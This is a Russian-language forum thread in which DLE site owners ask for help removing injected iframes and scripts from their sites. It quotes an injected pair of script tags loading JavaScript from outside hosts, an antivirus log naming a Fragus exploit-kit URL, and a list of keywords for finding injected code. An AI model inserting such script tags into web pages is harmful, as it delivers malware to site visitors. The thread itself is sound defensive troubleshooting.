Перейти к публикации

Для счастливчиков, кто на у себя на сайте находит трояна и ifram`ы


Рекомендованные сообщения

"не нашел" и "не знаю как удалить" - разные действия вообще-то. Удаляется просто: открываем файлы шаблона, например, в блокноте, выделяем нужный текст (код в данном случае) и нажимаем на кнопку "Delete". Всё.

Пардоньте, забыл... Заливаем исправленный шаблон обратно на сервер. :)

Изменено пользователем zgr
Ссылка на сообщение
Поделиться на других сайтах

"не нашел" и "не знаю как удалить" - разные действия вообще-то. Удаляется просто: открываем файлы шаблона, например, в блокноте, выделяем нужный текст (код в данном случае) и нажимаем на кнопку "Delete". Всё.

Пардоньте, забыл... Заливаем исправленный шаблон обратно на сервер. :)

механизм понятен, но вот в каком именно файле шаблона прописан этот код

Ссылка на сообщение
Поделиться на других сайтах

leksey, смотрите скорее всего в shortstory.tpl. У вас в каждой короткой новости стоит код на livetraf.com. Кстати, у меня антивирус атаку с вашего сайта заблокировал. Удаляйте коды, а то попадете к поисковикам в немилость...

05.01.2011 23:49

Попытка вторжения со стороны tlrpvv.info заблокирована.

Название угрозы: HTTP Fragus Toolkit Download Activity

Атакующий компьютер: tlrpvv.info (91.213.174.114, 80)

URL инициатора атаки: tlrpvv.info/counter/xzdrhtb.php?n=003

Целевой адрес: ......... (........., 49542)

Исходный адрес: 91.213.174.114 (91.213.174.114)

Описание трафика: TCP, www-http

Ссылка на сообщение
Поделиться на других сайтах

leksey, смотрите скорее всего в shortstory.tpl. У вас в каждой короткой новости стоит код на livetraf.com. Кстати, у меня антивирус атаку с вашего сайта заблокировал. Удаляйте коды, а то попадете к поисковикам в немилость...

проверил все файлы шаблона, нет этого кода, как тогда ставится этот код на сайт?

Ссылка на сообщение
Поделиться на других сайтах

leksey,

сделайте бекап БД и провеьте в БД, есть ли там это.

бэкап делал, все так же вирус есть, старых бекапов нет,

в общем как я понял надо искать в базе данных - своего опыта тут не хватает, будем привлекать специалистов

Ссылка на сообщение
Поделиться на других сайтах

Еще на злобу дня.

В новостях прописалось следующее:

<script src="http://zheenix.msk.ru/4f123dceb7a699d6f3297f12eba09c92.js" type="text/javascript"></script><script src="http://ivan81.ucoz.ru/engine.js" type="text/javascript"></script>

И так в короткой и в полной новости. сайт грузит КАПЕЦ!

Подскажите в каком файле прописалась эта зараза? Не могу найти.

Ссылка на сообщение
Поделиться на других сайтах

AnnaS,

В базе данных это у вас а не в файлах, а причина несвоевременная установка патчей безопасности http://dle-news.ru/bags/ а в частности http://dle-news.ru/bags/v90/1127-nedostatochnaya-filtraciya-vhodyaschih-dannyh.html

Ссылка на сообщение
Поделиться на других сайтах

кстати все файлы прокручивайте вниз до упора в редакторе... в некоторых шабах находил код на 1000-2000 строк ниже всего...

Ссылка на сообщение
Поделиться на других сайтах
  • 8 месяцев спустя...

Ребят подскажите где может эта дрянь сидеть. Находится она перед - <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> в index.php не нашел, в engine.php тоже нет :(

Ссылка на сообщение
Поделиться на других сайтах

kamwork, укажите ссылку на Ваш сайт

Ссылка на сообщение
Поделиться на других сайтах

kamwork,

это может быть любой файл, перезалейте все файлы дистрибутива скрипта. Если не поможет смотрите все файлы в папке engine/data/ они не обновляются при перезаливке файлов скрипта.

Ссылка на сообщение
Поделиться на других сайтах
  • 1 год спустя...

Господа помогите разобраться, плз.

Что произошло - обновил движок до 9.7, через два дня сообщение от яндекса - "На сайте tudimon.com обнаружен потенциально опасный код"

Что делал:

1. Проверил 2ip.ru/site-virus-scaner/ - На сайте обнаружены iframe-вставки, ссылающиеся на сомнительные сайты либо обфусицированный код.

2. Проверил siteguard.ru - ругается только на вставки счетчиков и гугл-аналистик, ифраймов не нашел.

3. Пошерстил файлы и шаблон - ничего криминального не заметил.

Убирать счетчики и аналистик или я что-то не заметил?

Дополнительное "расследование" показало, что если удалить код гугл-аналистика, то 2ип говорит, что сайт чистый.

Изменено пользователем tudimon
Ссылка на сообщение
Поделиться на других сайтах

Продолжение истории...

Отправил письмо в службу поддержки яндекса

Добрый день.

На прошлой неделе получил письмо с сообщением "Этот сайт может угрожать безопасности вашего компьютера".

После анализа различными сервисами поиска вирусов была выявлено, что сервис ругается на скрипт google analytics, скрипт был обновлен, перепроверка не выявила угроз.

На этой неделе получаю аналогичное письмо - сайт опять угрожает.

Убрал google analytics вообще со страниц сайта, перепроверка все равно указывает на угрозы.

Провел проверку сайта с помощью онлайн сервисов:

http://2ip.ru/site-virus-scaner/

http://www.freedrweb.com/aid_admin/

http://www.siteguard.ru

http://safeweb.norton.com/

https://www.virustotal.com/

http://antivirus-alarm.ru/proverka/

http://virusscan.jotti.org/ru

ни один из них не выявил угроз посетителям сайта.

Сравнение файлов CMS так же не выявило никаких внедрений в сайт.

Прошу помощи в выяснении куска кода на страницах моего сайта, который не нравится партнёру Яндекса компании Sophos, и возврата в поисковую выдачу без пометок «Этот сайт может угрожать безопасности вашего компьютера»

Заранее спасибо

С уважением, Дмитрий

Потому что осталось надеяться только на их помощь

Ссылка на сообщение
Поделиться на других сайтах

Провел проверку сайта с помощью онлайн сервисов: http://2ip.ru/site-virus-scaner/ http://www.freedrweb.com/aid_admin/ http://www.siteguard.ru http://safeweb.norton.com/ https://www.virustotal.com/ http://antivirus-alarm.ru/proverka/ http://virusscan.jotti.org/ru ни один из них не выявил угроз посетителям сайта.

Эти сервисы не проверяют все странички сайтов, а лишь ту, которую Вы вводите. (поэтому не вижу смысла от этих сервисов)

Вирус может быть на любой другой страничке сайта. Проверьте свою базу данных на наличие в ней таких слов:

1) javascript

2) script

3) document

4) iframe

5) eval

6) data:

Ссылка на сообщение
Поделиться на других сайтах

WWW.ZEOS.IN,но с чего то нужно начинать же поиски. Я им скармливал несколько страниц, в том числе и ту на которую ругался яндекс.

Но ничего не обнаружил, как и при просмотре кода страничек.

Вот что ответил яндекс:

Действительно, сейчас с Вашим сайтом все в порядке.

Ранее при проверке Вашего сайта наши алгоритмы обнаружили код, автоматически перенаправляющий посетителей на другие ресурсы при посещении сайта с мобильных устройств.

Подробнее прочитать о политике Яндекса в отношении мобильных редиректов вы можете в нашем блоге Поиска:

http://webmaster.ya....l?item_no=12778

http://webmaster.ya....l?item_no=13106

В движке отключена мобильная версия. При заходе с телефона вижу обычный сайт.

Изменено пользователем tudimon
Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...